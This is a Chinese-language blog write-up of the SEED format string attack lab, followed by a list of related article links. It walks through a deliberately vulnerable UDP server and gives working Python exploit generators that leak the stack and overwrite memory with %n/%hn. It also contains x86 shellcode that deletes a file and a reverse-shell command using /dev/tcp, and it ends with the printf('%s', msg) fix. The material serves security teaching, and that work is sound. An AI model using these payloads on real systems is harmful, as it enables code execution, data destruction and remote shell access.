mdzzname
mdzzname

信息安全 SEED Lab6 Format String Attack Lab

这个实验主要是进行格式化字符串攻击,先用下面命令关闭系统的地址随机化功能。

 sudo sysctl -w kernel.randomize_va_space=0

 

1. Task 1

存在格式化字符串漏洞的程序代码如下:

#include 
#include 
#include 
#include 
#include 
#include 

#define PORT 9090

/* Changing this size will change the layout of the stack.
* We have added 2 dummy arrays: in main() and myprintf().
* Instructors can change this value each year, so students
* won’t be able to use the solutions from the past.
* Suggested value: between 0 and 300 */
#ifndef DUMMY_SIZE
#define DUMMY_SIZE 100
#endif

char *secret = "A secret message\n";
unsigned int target = 0x11223344;

void myprintf(char *msg)
{
    uintptr_t framep;
    // Copy the ebp value into framep, and print it out
    asm("movl %%ebp, %0" : "=r"(framep));
    printf("The ebp value inside myprintf() is: 0x%.8x\n", framep);

    /* Change the size of the dummy array to randomize the parameters
    for this lab. Need to use the array at least once */
    char dummy[DUMMY_SIZE]; memset(dummy, 0, DUMMY_SIZE);

    // This line has a format string vulnerability
    printf(msg);

    printf("The value of the ’target’ variable (after): 0x%.8x\n", target);
}

void main()
{
    struct sockaddr_in server;
    struct sockaddr_in client;
    int clientLen;
    char buf[1500];

    /* Change the size of the dummy array to randomize the parameters
    for this lab. Need to use the array at least once */
    char dummy[DUMMY_SIZE]; memset(dummy, 0, DUMMY_SIZE);

    printf("The address of the input array: 0x%.8x\n", (unsigned) buf);


    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    memset((char *) &server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(PORT);

    if (bind(sock, (struct sockaddr *) &server, sizeof(server)) < 0)
        perror("ERROR on binding");

    while (1) {
        bzero(buf, 1500);
        recvfrom(sock, buf, 1500-1, 0, (struct sockaddr *) &client, &clientLen);
        myprintf(buf);
    }
    close(sock);
}

使用下面的命令进行编译

gcc -z execstack -o server server.c

运行一下,可以发现这就是简单地网络程序,接受tcp连接发来的字符串并打印。

信息安全 SEED Lab6 Format String Attack Lab_第1张图片

 

2. Task 2

这部分主要是让你熟悉在 myprintf 函数 中调用 printf 函数时栈上的空间布局 并回答问题。

信息安全 SEED Lab6 Format String Attack Lab_第2张图片

Q1: 标号为1, 2, 和 3 的地方的地址是多少?

A1: 从 server程序的运行结果中可以看出buf的地址为 0xbffff090, 即为标记3的地址。 myprintf中ebp值为0xbfffefe8, 所以标记2的地址为ebp+0x4 = 0xbfffefe8 + 0x4 = 0xbfffefec.至于标记1的地址,可以通过汇编代码计算出来,也可以通过调试时位置的相对偏移计算出来。

1. 通过汇编代码计算

如通过汇编代码计算,先使用下面的命令生成反汇编

objdump -S server > server.s

其中myprintf函数的反汇编代码如下:

080485eb :
 80485eb:	55                   	push   %ebp
 80485ec:	89 e5                	mov    %esp,%ebp
 80485ee:	81 ec 88 00 00 00    	sub    $0x88,%esp
 80485f4:	8b 45 08             	mov    0x8(%ebp),%eax
 80485f7:	89 45 84             	mov    %eax,-0x7c(%ebp)
 80485fa:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
 8048600:	89 45 f4             	mov    %eax,-0xc(%ebp)
 8048603:	31 c0                	xor    %eax,%eax
 8048605:	89 e8                	mov    %ebp,%eax
 8048607:	89 45 8c             	mov    %eax,-0x74(%ebp)
 804860a:	83 ec 08             	sub    $0x8,%esp
 804860d:	ff 75 8c             	pushl  -0x74(%ebp)
 8048610:	68 34 88 04 08       	push   $0x8048834
 8048615:	e8 16 fe ff ff       	call   8048430 
 804861a:	83 c4 10             	add    $0x10,%esp
 804861d:	83 ec 04             	sub    $0x4,%esp
 8048620:	6a 64                	push   $0x64
 8048622:	6a 00                	push   $0x0
 8048624:	8d 45 90             	lea    -0x70(%ebp),%eax
 8048627:	50                   	push   %eax
 8048628:	e8 83 fe ff ff       	call   80484b0 
 804862d:	83 c4 10             	add    $0x10,%esp
 8048630:	83 ec 0c             	sub    $0xc,%esp
 8048633:	ff 75 84             	pushl  -0x7c(%ebp)
 8048636:	e8 f5 fd ff ff       	call   8048430 
 804863b:	83 c4 10             	add    $0x10,%esp
 804863e:	a1 44 a0 04 08       	mov    0x804a044,%eax
 8048643:	83 ec 08             	sub    $0x8,%esp
 8048646:	50                   	push   %eax
 8048647:	68 60 88 04 08       	push   $0x8048860
 804864c:	e8 df fd ff ff       	call   8048430 
 8048651:	83 c4 10             	add    $0x10,%esp
 8048654:	90                   	nop
 8048655:	8b 45 f4             	mov    -0xc(%ebp),%eax
 8048658:	65 33 05 14 00 00 00 	xor    %gs:0x14,%eax
 804865f:	74 05                	je     8048666 
 8048661:	e8 fa fd ff ff       	call   8048460 <__stack_chk_fail@plt>
 8048666:	c9                   	leave  
 8048667:	c3                   	ret

我们先找到第二个printf的参数的地址,从上面的代码中,不难计算出,参数的地址为 ebp - 0x88 -0x8 - 0x4 - 0x4 + 0x10 - 0x4 - 0x4 - 0x4 - 0x4 + 0x10 - 0xc - 0x4 = ebp - 0x98.

ebp的值就是打印出的0xbfffefe8, 所以标记1的地址即为0xbfffefe8 - 0x98 = 0xbfffef50.

综上所述 标记 1, 2,3的地址分别为 0xbfffef50,0xbfffefec,0xbffff090。

2. 调试计算

同理也可以采用调试的时候获取相对偏移计算地址。

在myprintf中打下断点,并执行到断点处,可以查看到 此时 ebp = 0xbfffe428, esp = -xbfffe3a0

信息安全 SEED Lab6 Format String Attack Lab_第3张图片

再使用si, fin 执行到第二个printf处,可以看到参数的地址为0xbffffe390, 相对ebp的偏移为 0xbffffe390 - 0xbfffe428 = -0x98.

打印输出的myprintf函数的ebp地址为 0xbfffefe8,所以实际运行时printf参数地址为0xbfffefe8 - 0x98 = 0xbfffef50. 可以看到与上面通过汇编代码分析的一致,

其他两个地址与上面的一致,都是直接从打印输出中获得。

信息安全 SEED Lab6 Format String Attack Lab_第4张图片

Q2: 标号为1 和 3的地方距离是多少?

A2: 从Q1中可知, 标号为1和3的地址分别为 0xbfffef50,0xbffff090。所以相隔的距离为0xbffff090 - 0xbfffef50 = 0x140

 

 

3. Task 3

这部分主要是实施攻击让server程序崩溃,比较简单。

先新建一个badfile,该文件的内容为通过网络发送到server的数据。发送时使用下面命令即可。

cat badfile | nc -u 127.0.0.1 9090

这里我简单设置badfile文件内容为 %n, 尝试攻击可以发现攻击成功,server直接报错退出运行

如果攻击失败,可以尝试增加%n的个数,也可以尝试其他的字符串。

 

 

4. Task 4

这部分主要是通过攻击打印栈上的内容,生成badfile的辅助代码如下

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffeeee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*12 + "%s"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

4.1 Task 4.A

这部分是计算打印到输入的buf的第一个四字节所需要的%x的个数。

在task 2 Q2中已经计算除了标记1和3之间的距离为0x140, 即0x140/4 = 80个四字节。

所以所需%x的个数为80个。

将上面生成badfile的py代码修改为如下所示

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xffffffff
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*80

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

生成badfile并进行攻击,输出如下,可以发现最后刚好输出了badfile的最前面的4个字节。同理最前面的四个乱码字符其实也是badfile的最前面4个字节,只是0xff并未编码为ascii中的任何字符,所以显示乱码,但后面的abcd是正常的输出。

信息安全 SEED Lab6 Format String Attack Lab_第5张图片

不难猜测,如果增加到81个%x则可以在后面输出abcd的ascii编码。尝试后输出如下。查看ascii编码表可以发现a的ascii编码为0x61,其他几个依次类推,这说明我们的

猜想是对的。

信息安全 SEED Lab6 Format String Attack Lab_第6张图片

 

4.1 Task 4.B

这部分主要是假设我们知道秘密字符串的地址,利用攻击输出字符串。

printf函数族支持的格式符如下,我们要传递一个地址过去,要想输出地址中的数据,只有%s能做到,其他都不行

信息安全 SEED Lab6 Format String Attack Lab_第7张图片

这里演示我们就以输出我们输入的字符串为例,其地址为 0xbffff090。

修改生成badfile的py如下

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbffff090
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*79 + "%s"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

生成badfile并攻击,输出如下,可以看到在后面输出了我们输入的字符串,以4个乱码字符串开始,紧接着为abcd,后面是一堆%.8x

信息安全 SEED Lab6 Format String Attack Lab_第8张图片

 

 

5. Task 5

这部分主要是通过攻击修改程序的内存

5.1 Task 5.A

这部分主要是修改target的值为另一个不一样的值即可。首先我们要找出target的地址,这里我们直接查看myprintf函数汇编代码,其中关于第3个printf调用的代码如下:

 8048636:	e8 f5 fd ff ff       	call   8048430 
 804863b:	83 c4 10             	add    $0x10,%esp
 804863e:	a1 44 a0 04 08       	mov    0x804a044,%eax
 8048643:	83 ec 08             	sub    $0x8,%esp
 8048646:	50                   	push   %eax
 8048647:	68 60 88 04 08       	push   $0x8048860
 804864c:	e8 df fd ff ff       	call   8048430

结合C源码从中可以看出target的地址为0x804a044。由此构造生成badfile的py代码如下:

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0x804a044
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*79 + "%n"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

攻击后的输出如下,原本target的值为0x11223344,现在被修改为了0x280

信息安全 SEED Lab6 Format String Attack Lab_第9张图片

 

 

5.1 Task 5.B

这部分是通过攻击将target的值修改为0x500。由于在task5.A中,已经可以设置target为0x280,距离目标还差0x500 - 0x280 = 0x280 =  640个字符。再加上原本%.8x应该输出的8个字符,所以最后一个应该填写%.648x。最后生成badfile的py代码中设置s的关键一行改成如下:

s = "%.8x"*78 + "%.648x" + "%n"

生成badfile并进行攻击,输出如下,可以看到target的值成功被改成了0x500

信息安全 SEED Lab6 Format String Attack Lab_第10张图片

 

5.1 Task 5.C

这部分是把target的值改成0xff990000。如果仍然采用前面的方法,会出现输出耗时过长和其他问题。我们将0xff990000分成前后两部分,前半部分为0xff99 = 65433,

所以需要打印65433个字符,后半部分0x0000,我们可以通过打印0x10000 = 65536个字符造成溢出使得写入0x0000。中间相差了65536-65433 = 103个字符。

target的低2个字节地址为 0x804a044, 高2个字节地址为0x804a046。由于改写高2个字节所需的打印字符串(65433个) 小于低2个字节所需打印字符数,所以我们先处理高2个字节,我们把高两个字节的地址0x804a046放在输入数据最前端, 中间仍然放一个4字节的abcd用于输出填充前后两部分所需打印字符数量的差异,再后面放第2个字节的地址0x804a044. 按task5.B分析最后一个%x中的数字应该改成0xff99 - 0x280 + 8 = 0xfd21 = 64801个, 由于相比task5.B 多放了一个地址,其会输出4个字符,所以实际填充64801-4 = 64797个,后面再加上一个%hn, 即可完成对高2个字节的修改 。中间再塞一个%.103x, 最后塞一个 %hn, 即可完成对低2个字节的修改。

最后的生成badfile的exploit.py代码如下:

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0x804a046
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to store an integer at offset 0
number = 0x804a044
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.64797x" + "%hn" + "%.103x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[12:12+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

生成badfile并进行攻击,输出如下,可以看到target的值已经成功被改成了0xff990000

信息安全 SEED Lab6 Format String Attack Lab_第11张图片

 

 

6. Task 6

这部分主要是通过攻击注入代码并删除指定文件,具体思路就是将代码作为数据发送到栈上的缓冲区中,并通过攻击修改返回地址,使其跳转到shellcode,从而删除文件

首先我们要找到printf的返回地址及其地址。调试执行到myprintf函数中的第二个printf函数。在task2中我们已经知道标记 1, 2,3的地址分别为 0xbfffef50,0xbfffefec,0xbffff090。标记2中的内容就是返回地址,也就是说我们要将0xbfffefec位置的内容改成shellcode的起始地址。buf的地址为0xbffff090, buf为1500字节,末地址为0xbffff090 + 1500 - 1 = 0xbffff66b, shellcode的地址会比这个值略大一些,这里我们还是按照task5.c中的方法去进行修改。

在task5.c中,要修改为0xff990000, 这里要修改为0xbffff090-0xbffff66b之间的某个值。前半段为0xbfff,后半段为0xf090-0xf66b。两者相差最大为0xf66b-0xbfff=0x366c=13932, 即最大可用五位数表示。因此我们将task5.c中的代码的关键行改成下面的模板

s = "%.8x"*78 + "%.64797x" + "%hn" + "%.00103x" + "%hn"

其中 "%.64797x" 和 "%.00103x" 可以固定为5位,不够直接补0即可,具体数字再计算。

对于高2字节固定为0xbfff, 所以先处理高位,其地址为0xbfffefec + 2 = 0xbfffefee, 要填充的数组我们通过相对偏移进行计算0xff99 - 0xbfff + 64797 = 48515。因此第一个填充的数为 "%.48515x"。上面的代码变为

s = "%.8x"*78 + "%.48515x" + "%hn" + "%.00103x" + "%hn"

这时可以计算shellcode的地址了,即s后一个字节的地址,这里我们直接稍微修改exploit.py计算shellcode地址

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffefee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to store an integer at offset 0
number = 0xbfffefec
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.064797x" + "%hn" + "%.00103x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
print("shellcode addr: ", hex(12 + len(fmt) + 0xbffff090)) # addr of buf is 0xbffff090
content[12:12+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

输出如下,可知shellcode的地址为0xbffff1ea, 后半段-前半段=0xf1ea-0xbfff = 12779字节。所以修改关键行的第二处为 "%.12779x"

最后将恶意代码放在关键行的后面即可,得到的exploit.py 如下(要注意下面代码标号1处有4个空格,多了少了会报段错误)

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffefee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
    # Push the command ’/binbash’ into stack ( is equivalent to /)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""bash" # pushl "bash"
    "\x68""" # pushl ""
    "\x68""/bin" # pushl "/bin"
    "\x89\xe3" # movl %esp, %ebx

    # Push the 1st argument ’-ccc’ into stack (-ccc is equivalent to -c)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""-ccc" # pushl "-ccc"
    "\x89\xe0" # movl %esp, %eax

    # Push the 2nd argument into the stack:
    # ’/bin/rm /tmp/myfile’
    # Students need to use their own VM’s IP address
    "\x31\xd2" # xorl %edx,%edx
    "\x52" # pushl %edx
    "\x68""    " # pushl (an integer) ➀
    "\x68""ile " # pushl (an integer)
    "\x68""/myf" # pushl (an integer)
    "\x68""/tmp" # pushl (an integer)
    "\x68""/rm " # pushl (an integer)
    "\x68""/bin" # pushl (an integer) ➁
    "\x89\xe2" # movl %esp,%edx

    # Construct the argv[] array and set ecx
    "\x31\xc9" # xorl %ecx,%ecx
    "\x51" # pushl %ecx
    "\x52" # pushl %edx
    "\x50" # pushl %eax
    "\x53" # pushl %ebx
    "\x89\xe1" # movl %esp,%ecx

    # Set edx to 0
    "\x31\xd2" #xorl %edx,%edx
    
    # Invoke the system call
    "\x31\xc0" # xorl %eax,%eax
    "\xb0\x0b" # movb $0x0b,%al
    "\xcd\x80" # int $0x80
).encode("latin-1")

# ret_code = (
#     "\xff\x35\x3b\x86\x04\x08" # push 0x804863b 
#     "\xc3"                     # ret
# ).encode(’latin-1’)

# This line shows how to store an integer at offset 0
number = 0xbfffefec
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.48515x" + "%hn" + "%.12779x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
print("shellcode addr: ", hex(12 + len(fmt) + 0xbffff090)) # addr of buf is 0xbffff090
content[12:12+len(fmt)] = fmt
content[12+len(fmt):12+len(fmt)+len(malicious_code)] = malicious_code

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

检查发现上面的代码的shellcode部分可能被富文本编辑器处理后存在显示问题,会消失,下面是shellcode的截图,请仔细核对

信息安全 SEED Lab6 Format String Attack Lab_第12张图片

下面进行攻击,先新建/tmp/file文件,再生成badfile进行攻击

信息安全 SEED Lab6 Format String Attack Lab_第13张图片

输出如下,再查看/tmp/myfile文件,发现已经被删除了

信息安全 SEED Lab6 Format String Attack Lab_第14张图片

 

7. Task 7

这部分主要是利用攻击创建反向shell,比较简单,只要将命令改成下面的即可

/bin/bash -c "/bin/bash -i > /dev/tcp/127.0.0.1/7070 0<&1 2>&1"

最后的exploit.py如下:

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffefee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
    # Push the command ’/binbash’ into stack ( is equivalent to /)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""bash" # pushl "bash"
    "\x68""" # pushl ""
    "\x68""/bin" # pushl "/bin"
    "\x89\xe3" # movl %esp, %ebx

    # Push the 1st argument ’-ccc’ into stack (-ccc is equivalent to -c)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""-ccc" # pushl "-ccc"
    "\x89\xe0" # movl %esp, %eax

    # Push the 2nd argument into the stack:
    # ’/bin/rm /tmp/myfile’
    # Students need to use their own VM’s IP address
    "\x31\xd2" # xorl %edx,%edx
    "\x52" # pushl %edx
    "\x68""    " # pushl (an integer) ➀
    "\x68"">&1 " # pushl (an integer) ➁
    "\x68""&1 2" # pushl (an integer) ➁
    "\x68""0 0<" # pushl (an integer) ➁
    "\x68""/707" # pushl (an integer) ➁
    "\x68"".0.1" # pushl (an integer) ➁
    "\x68""27.0" # pushl (an integer) ➁
    "\x68""cp/1" # pushl (an integer) ➁
    "\x68""ev/t" # pushl (an integer) ➁
    "\x68""> /d" # pushl (an integer) ➁
    "\x68"" -i " # pushl (an integer) ➁
    "\x68""bash" # pushl (an integer) ➁
    "\x68""" # pushl (an integer) ➁
    "\x68""/bin" # pushl (an integer) ➁
    "\x89\xe2" # movl %esp,%edx

    # Construct the argv[] array and set ecx
    "\x31\xc9" # xorl %ecx,%ecx
    "\x51" # pushl %ecx
    "\x52" # pushl %edx
    "\x50" # pushl %eax
    "\x53" # pushl %ebx
    "\x89\xe1" # movl %esp,%ecx

    # Set edx to 0
    "\x31\xd2" #xorl %edx,%edx
    
    # Invoke the system call
    "\x31\xc0" # xorl %eax,%eax
    "\xb0\x0b" # movb $0x0b,%al
    "\xcd\x80" # int $0x80
).encode("latin-1")

# ret_code = (
#     "\xff\x35\x3b\x86\x04\x08" # push 0x804863b 
#     "\xc3"                     # ret
# ).encode(’latin-1’)

# This line shows how to store an integer at offset 0
number = 0xbfffefec
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.48515x" + "%hn" + "%.12779x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
print("shellcode addr: ", hex(12 + len(fmt) + 0xbffff090)) # addr of buf is 0xbffff090
content[12:12+len(fmt)] = fmt
content[12+len(fmt):12+len(fmt)+len(malicious_code)] = malicious_code

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

检查发现上面的代码的shellcode部分可能被富文本编辑器处理后存在显示问题,会消失,下面是shellcode的截图,请仔细核对

信息安全 SEED Lab6 Format String Attack Lab_第15张图片

用nc命令开启一个进程监听7070端口,再进行攻击,可以看到成功连上了反向shell,且拥有root权限。

信息安全 SEED Lab6 Format String Attack Lab_第16张图片

 

8. Task 8

这部分主要是分析原因和修复。编译server.c时的warning如下

信息安全 SEED Lab6 Format String Attack Lab_第17张图片

这个warning就是指非常量字符串作为模板字符串,且没有格式化参数。要解决这个warning,只要将printf(msg) 改成 printf("%s", msg)即可

修改之后再编译可以发现不再报warning

修改之后,我们再尝试task4中的攻击,输出如下,可以发现,输出的都是我们构造的输入

信息安全 SEED Lab6 Format String Attack Lab_第18张图片

下面是前面task4的攻击输出,对比可以发现,输出的而不是栈上的内容,而是我们构造的输入,所以我们的攻击失败了

信息安全 SEED Lab6 Format String Attack Lab_第19张图片

原因其实就是因为格式化的字符串是程序自己提供的,这个字符串才决定printf的行为,修改之后,外界无法影响到此字符串,因此攻击失败。

你可能感兴趣的:(信息安全,信息安全,SEED)

  • 个人网络防范 潜※者 网络安全
    目录安全事件频发根源在于背后利益链条不仅仅是中国网络安全事件成国际性难题个人网络信息安全防护四招来帮忙首先,预防第一第二,健康的上网浏览习惯第三,WiFi安全性第四,规范的文件处理黑客攻击无孔不入,钓鱼网站日益频发多发,伪基站不断升级,甚至从不联网的WindowsXP都有可能感染病毒。2016年6月23日,中国五联网协会发布的《2016中国网民权益保护调查报告》显示,从2015年下半年到2016年
  • 再扩国产化适配版图,长安链新增数据库兼容性认证 长安链开源社区 数据库
    基础软件的自主可控影响着国家信息安全与产业技术发展是否受制于人。实现真正长期可持续的技术自主可控,需要再进一步的是让国产化信息系统生态更有”活性“,基础软件之间、基础软件与其他国产上层应用的互相兼容、互相促进,共同繁荣发展,才能让产业链上下游具备多样性和技术创新的空间。近日长安链对国产数据库完成了兼容性认证,在与达梦数据库、TDSQL的测试中,表明长安链与联合测评的国产数据库兼容性良好、功能正常、
  • 在渗透领域,一个非常厉害的 Python 库 qq_30895747 python模块python开发语言
    在信息安全领域,PythonFsociety库是一个备受欢迎的工具,它提供了许多用于渗透测试、网络攻击和安全研究的功能。本文将深入探讨Fsociety库的功能、用法以及实际应用,以帮助大家更好地了解如何使用它来增强网络安全。什么是PythonFsociety库?Fsociety是一个Python库,专门设计用于进行渗透测试、网络攻击和信息安全研究。它提供了各种工具和功能,以帮助安全专业人员测试网络
  • 第九章、信息安全与多媒体基础5分 蒋劲豪 软考-中级-软件设计师软件工程
    信息系统安全属性保密性、完整性、可用性、可控性、可审查性网络安全威胁物理威胁、网络攻击、身份鉴别、编程威胁、系统漏洞对称加密DES、3DES、AES、RC-5、IDEA
  • 拼多多会不会透露个人信息?别人会看到你的个人信息吗 氧惠购物达人
    拼多多是中国颇具规模的电子商务平台,与其他在线平台一样,为提供更佳服务而收集并处理用户个人信息。随着在线购物的兴起,用户隐私和信息安全备受关注。➤推荐网购返利app“氧惠”,一个领隐藏优惠券+现金返利的平台。氧惠只提供领券返利链接,下单全程都在淘宝、京东、拼多多等原平台,更支持抖音、快手电商、外卖红包返利等。(应用市场搜“氧惠”下载,邀请码:521521,全网优惠上氧惠!)➤由于信息差的关系,很多
  • 反向代理服务器如何提升信息安全 小文没烦恼 python网络服务器开发语言代理服务器
    目录前言一、反向代理服务器提升信息安全的功能1.1负载均衡1.2缓存1.3SSL加密1.4访问控制二、反向代理服务器提升信息安全的实现方式2.1Nginx反向代理服务器2.2Apache反向代理服务器总结前言反向代理服务器是一种位于客户端和目标服务器之间的中间层服务器,它接收客户端的请求并将其转发给目标服务器。反向代理服务器在提供负载均衡、缓存、SSL加密等功能的同时,还可以起到一定的信息安全保护
  • linux安全配置规范 十年人间~ linux安全服务器
    一、概述1.1适用范围本配置规范适用于凝思操作系统,主要涉及LINUX操作系统安全配置方面的基本要求,用于指导LINUX操作系统安全加固工作,落实信息安全等级保护等保三级系统操作系统安全配置,为主机安全配置核查提供依据。1.2实施策略序号配置类别配置项名称实施策略1身份鉴别口令复杂度策略合规2身份鉴别登录失败账户锁定策略合规3身份鉴别口令最长生存期策略合规4身份鉴别SSH登录配置合规5访问控制多余
  • 计算机等级考试:信息安全技术 知识点二 ting_liang 计算机网络
    1、信息技术的飞速发展,对人类社会产生了重要影响,其主流是积极的,但也客观存在一些负面影响,这些负面影响有:信息泛滥、信息污染、信息犯罪。2、1949年,香农发表了著名的《保密系统的通信理论》的论文,把密码学置于坚实的数学基础上,标志着密码学作为一门学科的形成。3、数字签名的过程使用的是签名者的私有密钥,验证数字签名时,使用的是签名者的公有密钥。4、已知最早的代换密码是由JuliusCaesar发
  • 直返平台的信誉度如何评估?直返APP是否可信? 高省爱氧惠
    直返作为一个购物平台,始终秉持着为用户提供安全、稳定、可靠的服务。我们有着严格的安全措施和技术手段,确保用户的信息安全和交易安全。同时,我们与多家知名品牌和商家合作,保证商品的正品保障和品质可靠。氧惠APP(带货领导者)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(每天出单带货几十万单)。注册即可享受高补贴+0撸+捡漏等
  • CCRC-DSO数据安全官 CCRC_137_1602_6231 安全运维网络安全服务器信息可视化
    数据安全官(DataSecurityOfcer,简称“DSO”)是中国网络安全审查技术与认证中心(英文缩写为:CCRC,原为中国信息安全认证中心)针对数据安全领域方向开设的培训认证。CCRC-DSO课程从顶层设计出发,培养对数据安全管理体系、法律合规数据治理、安全技术通盘整合的数据安全精英人才,保护数据安全,释放数据价值,决胜数字经济时代。请查收附件!系统体系化的数据安全课内容覆盖数据安全国际国内
  • 天星金融(原小米金融)加强信息安全普及,预防电信诈骗案件 Z8276q3 金融
    在高度发达的信息时代,随着移动互联网的普及和5G技术的推广,智能手机已经成为每个人生活的必需品。然而,一些诈骗分子趁虚而入,利用手机进行各种新型的诈骗活动,向消费者发送短信钓鱼链接是电信诈骗的常用手法之一。面对日益严峻且复杂的网络安全形势,天星金融(原小米金融)切实承担起网络安全风险防范的主体责任,加强金融消费者信息安全普及宣教,全力构建“全社会反诈”工作格局,从源头上预防和遏制电信诈骗案件。“短
  • 网络安全是什么 安全
    网络安全是一种保护计算机、服务器、移动设备、电子系统、网络和数据免受恶意攻击的技术,这种技术也称为信息技术安全或电子信息安全。该术语适用于从业务到移动计算的各种环境,可以分为几个常见类别:网络安全是一种保护计算机网络免受入侵者(无论是定向攻击还是条件恶意软件)攻击的技术。应用程序安全侧重于保护软件和设备免受威胁。受到侵害的应用程序可能会对其旨在保护的数据提供访问权限。并且,早在应用程序设计阶段而非
  • 阿里云高防服务器如何实现安全防护,以及如何接触安全防护 九河云 安全服务器阿里云
    随着互联网的发展,网络安全问题日益突出,不法分子利用网络空间进行各种网络攻击,如DDoS攻击、SQL注入、XSS漏洞等,给个人、企业甚至国家的信息安全带来了极大的威胁。为了保障网络安全,高防服务器和阿里云服务器是很好的选择,下面九河云来讲讲高防服务器怎样实现安全防护措施,以及阿里云服务器安全防护怎么解除。一、高防服务器的安全防护措施1、DDoS攻击防护DDoS攻击属于分布式拒绝服务攻击,其主要手段
  • 从玩游戏到写外挂,C语言/C++程序员大神是怎样做到的! 小辰带你看世界
    今天和大家分享一下我自己的C语言学习的过程,与大家共勉。嗯,由于我本人水平有限,出现错误在所难免,希望大家看到后能够指出来,以便大家共同进步。C语言是面向过程的,而C++是面向对象的这些是C/C++能做的服务器开发工程师、人工智能、云计算工程师、信息安全(黑客反黑客)、大数据、数据平台、嵌入式工程师、流媒体服务器、数据控解、图像处理、音频视频开发工程师、游戏服务器、分布式系统、游戏辅助等首先我来讲
  • 信息安全工程师(中级)-知识点汇总 琴剑飘零西复东 网络安全
